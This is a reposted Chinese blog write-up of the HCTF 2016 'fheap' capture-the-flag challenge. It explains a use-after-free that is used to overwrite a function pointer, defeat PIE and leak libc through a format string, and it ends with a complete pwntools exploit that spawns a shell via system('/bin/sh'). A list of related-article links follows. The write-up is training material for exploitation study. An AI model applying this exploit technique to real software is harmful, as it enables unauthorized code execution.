2016 hctf fheap 题解

最新推荐文章于 2021-08-21 22:33:37 发布
最新推荐文章于 2021-08-21 22:33:37 发布
阅读量517 收藏
点赞数
原文链接:http://www.cnblogs.com/H4lo/p/10611990.html
版权

题目链接

https://github.com/zh-explorer/hctf2016-fheap

题目分析

题目功能只有 malloc 和 free 的功能,查看堆的布局:

1618355-20190327231351358-232660206.png

全局指针没有置空,导致 uaf 和 double free 漏洞,两种都可以做,但是这题的重点是绕过 PIE。

1618355-20190327231421627-670231027.png

  • double free 完了之后,会导致下面的情况

1618355-20190327231448735-828354381.png

这里需要注意一下 create 函数的逻辑:如果输入的字符串的长度大于 15,则重新 maloc 一块堆块用来存放字符串,如图:

1618355-20190327231530451-1994541761.png

但是这里还是选择使用 uaf 来做。

整体思路

  1. malloc 两个堆块,delete 两个堆块

  2. 重新 malloc 一个堆块,size 大于 24,这样就 malloc 到原来的堆块的区域,因为全局 flag 处还存放着原来堆块的指针,所以存在 uaf 漏洞。

1618355-20190327231625629-741525278.png

  1. 因为这里存在溢出,可以覆盖 free_ptr 指针,在开启 pie 的情况下,覆盖最后一个字节使得 free_ptr 被覆盖成 puts ,接着 delete 堆块时相当于输出 puts 函数的地址,得到基地址。

  2. 重复上一步,接着覆盖 puts 指针为 printf 函数的指针,构造一个格式化字符串漏洞,输出得到libc地址

  3. 重复上一步,覆盖 printf 指针为 system 函数的指针,布置好 "/bin/sh",接着 delete 就调用了 system 函数

1618355-20190327231707336-657651056.png

  • 格式化字符串那里存在问题,无法正常找到 libc 的地址,只能随便找到一个 ld 库的一个地址,但是这里的偏移都是一样的。

EXP

#!/usr/bin/python

from pwn import *
DEBUG = 1

if DEBUG:
    r = process('./pwn-f')
    elf = ELF('./pwn-f')
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
else:
    r = remote('127.0.0.1',4444)

def create(size,content):
    r.recvuntil("3.quit")
    r.sendline("create ")
    r.recvuntil("Pls give string size:")
    r.sendline(str(size))
    r.recvuntil("str:")
    r.sendline(str(content))

def delete(idx):
    r.recvuntil("3.quit")
   r.sendline("delete ")
    r.recvuntil("id:")
    r.sendline(str(idx))
    r.recvuntil("Are you sure?:")
    r.sendline("yes")   

create(10,"aaa")
create(10,"bbb")


delete(1)
delete(0)

create(25,'f'*24+p8(0xE4))

delete(1)
r.recvuntil("f"*24)
puts_addr = u64(r.recvline("\n")[:-1].ljust(8,"\x00"))

base_addr = puts_addr - 0xde4
success("base_addr :" + hex(base_addr))

r.sendlineafter("Are you sure?:","H4lo")

delete(0)

printf_plt = base_addr + elf.plt['printf']

payload = "%51$s^^".ljust(24,'A')
payload += p64(printf_plt)

create(32,payload)

delete(1)
addr = u64(r.recv(6).ljust(8,'\x00'))

success(hex(addr))

success("libc_addr :"+hex(addr+0xaf8-0x5d2000))
libc_addr = addr+0xaf8-0x5d2000        # 取到偏移

delete(0)

payload = "/bin/sh;".ljust(24,'A')
payload += p64(libc_addr + libc.symbols['system'])

create(32,payload)

r.interactive()

参考:

https://github.com/zh-explorer/hctf2016-fheap
https://www.cnblogs.com/shangye/p/6156350.html
https://www.xctf.org.cn/library/details/21e9451548a2b5d01dcf411e90ba968fc54ac9a5/
https://blog.csdn.net/qq_33528164/article/details/79515831

转载于:https://www.cnblogs.com/H4lo/p/10611990.html

abc380620175
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
NOI2016天津市选拔赛(TJOI2016)题目题解及测试数据
02-11
本资源为2016年天津省选(TJOI2016)的资源整合,包括Day1、Day2的所有题目、题解和测试数据,仅供学习交流,选手代码和成绩排名已删去
2016 hctf fheap
BadRer的博客
06-10 438
2016 hctf fheap 前言 好久没写东西了,本想着简单记录一下,不过在做这题的时候,弄懂了之前困扰许多的问题,所以就多写一些吧,在此感谢俺的女票@曙雀 UAF IDA分析后,得到数据结构如下。 note: 00000000 note struc ; (sizeof=0x20, mappedto_9) 00000000 content_ptr dq ? 00000008 field_8 dq ? 00000010 str_size dd ?
HCTF 2016 fheap
Bill
03-11 2036
HCTF 2016 fheap 一. 源码 fheap.c 二. 题目分析 1. 程序的生成 假设我们的源码文件名叫做fheap.c gcc fheap.c -pie -fpic -o fheap strip fheap 其中-fpic是辅助-pie, 没有-fpic将会编译失败. strip是去除符号表(Discard symbols from obje...
hctf2016_fheap
qq_53062301的博客
07-30 209
看的第二道堆题目,也调试和想了很久,学了很多东西,这道题也是一道uaf,从create函数中可以看到,如果申请的chunk>0xF就会申请两个chunk,其中一个是malloc(0x20),另一个是malloc(size),如果申请的chunk<0xF时,距离chunk头0x28的地方会存放着free函数的指针,可供用户自己输入的位置是距离chunk头0x10的位置,当delete时就会调用这个指针函数,题目本身也只有create和delete这两个可用功能,checksec发现题目开启了PIE
hctf2016 fheap学习(FlappyPig队伍的解法)
weixin_30498807的博客
12-10 143
目录 漏洞原理 二次释放 如何在第二次释放前修改函数地址 fastbin的特性 修改函数指针流程 如何获得进程的加载基址 格式化字符串漏洞 确定printf函数在代码段中偏移 printf函数输出想要的地址 如何获得system函数的地址 寻找一个被fheap...
hctf2016-fheap
钞sir的博客
03-28 1万+
题目地址:https://github.com/zh-explorer/hctf2016-fheap 程序简介 程序中只有3个功能,一个create,一个delete然后一个quit: +++++++++++++++++++++++++++ So, let's crash the world +++++++++++++++++++++++++++ 1.create string 2.delete ...
PAT甲级所有题解代码
02-03
这里包含了179道PAT甲级的代码AC题解,供有需要通过PAT考试的同学下载学习使用。
洛谷CF1458B题解
最新发布
02-05
有关CF1458B的题解
noi2016 旷野大计算 题解1
08-03
(听说跳蚤国已占领 NOI 题面了,但我们确实是分开写的题面 233)吕凯风 王逸松 于纪平 张瑞喆旷野大计算旷野大计算题目大意1图片来源:电影《赤壁》吕凯风
Codeforces 1925D Good Trip 题解
02-03
Codeforces 1925D Good Trip 题解
hctf2016[pwn]-fheap
CharlesGodX的博客
03-30 1570
0x00:前言 这道题是一道堆栈混合加格式化字符串的题目,题目的利用点不错,很适合好好做一遍。 0x01:题目链接 https://github.com/zh-explorer/hctf2016-fheap 0x02:解题思路 首先查看程序保护 root@Thunder_J-virtual-machine:~/桌面# checksec pwn-f [*] Checking for new vers...
HCTF 2016 fheap 做题笔记
fa1c4的blog
08-21 479
前言 一道UAF题, HCTF 2016 - fheap ctfhub搜fheap 过程 __int64 __fastcall main(int a1, char **a2, char **a3) { char buf[1032]; // [rsp+0h] [rbp-410h] BYREF unsigned __int64 v5; // [rsp+408h] [rbp-8h] v5 = __readfsqword(0x28u); setbuf(stdout, 0LL); setbu
hctf2016 fheap学习(FreeBuf发表的官方解法)
weixin_30664615的博客
12-10 176
目录 如何在二次释放前修改函数指针 修改函数指针流程 如何获得进程的加载基址 puts函数的调用 如何获取system函数地址 说一下用DlyELF函数 如何调用system函数 ROP需要的栈布局 read函数的妙用 参数”/bin/sh”如何传递过去 参考...
2016hctf writeup
Aurora的博客
03-04 3220
MISC杂项签到 http://139.224.54.27/webco1a/+_+.pcapng 用wireshark打开流量包,追踪TCP流,发现是一个webshell的流量,看到webshell控制端查看了远程服务器上的两个关键文件:function.py和flag cat function.py: #!/usr/bin/env python # coding:utf-8 __au
hctf2016 web 部分WriteUp.md
Bendawang's Blog
11-28 4633
hctf2016 web 部分WriteUp
2016hctf Writeup.md
热门推荐
Ni9htMar3的博客
12-05 1万+
第一次和同学以战队MiRag3参加XCTF联赛,经验不足,技术较弱,以后会加倍努力~!留个爪纪念一下~~WEB2099年的flag直接burpsuit截断,修改消息请求头如下:直接得到flagRESTFUL这里主要考察的是RESTFUL格式 index.php/参数/值 然后根据提示只要put money 大于 12450即可兵者多诡题目说明为上传图片,首先上传一个图片试试。点击上传图片,发现u
初探UAF漏洞:2016 HCTF fheap
Vicl1fe的博客
09-21 895
参考链接:CTF_wiki 讨论qq群:946220807,欢迎大佬来指导 UAF 刚学堆,学到了UAF(use after free)漏洞,UAF本质是free后,并没有把指针指向null,导致free后,指针还可被使用。用2016 HCTF fheap来说明一下。题目也在参考链接里。 分析 看到这个程序实现了3个功能,add note,delete not,print note。 在add_...
hctf2016_fheap(partial write)
seaaseesa的博客
06-10 554
hctf2016_fheap 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,add函数中,如果字符串长度大于15,则单独malloc一块内存存放字符串,否则直接存结点里。 Delete功能没有清空指针,因此,存在UAF, 我们可以第字节将节点里的free代理函数指针修改掉,利用低字节覆盖,使其指向printf函数plt表,这样,当我们用UAF去delete这个堆时,就会调用printf,这样我们可以利用格式化字符串去泄露数据。然后就可以利用UAF,去执行system函数了。
省ZJ2017 F Heap Partition【贪心+权值线段树】
Irish_Moonshine的博客
04-24 274
A sequence S = {s1, s2, …, sn} is called heapable if there exists a binary tree T with n nodes such that every node is labelled with exactly one element from the sequence S, and for every non-root nod...
P1173 [NOI2016] 网格 题解
03-04
这是一道算法题,需要使用动态规划来解决。题目描述为在一个网格中,从左上角走到右下角,每次只能向右或向下走,每个格子有一个权值,求从左上角到右下角的路径,使得路径上的权值和最小。 具体的解题思路可以参考...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值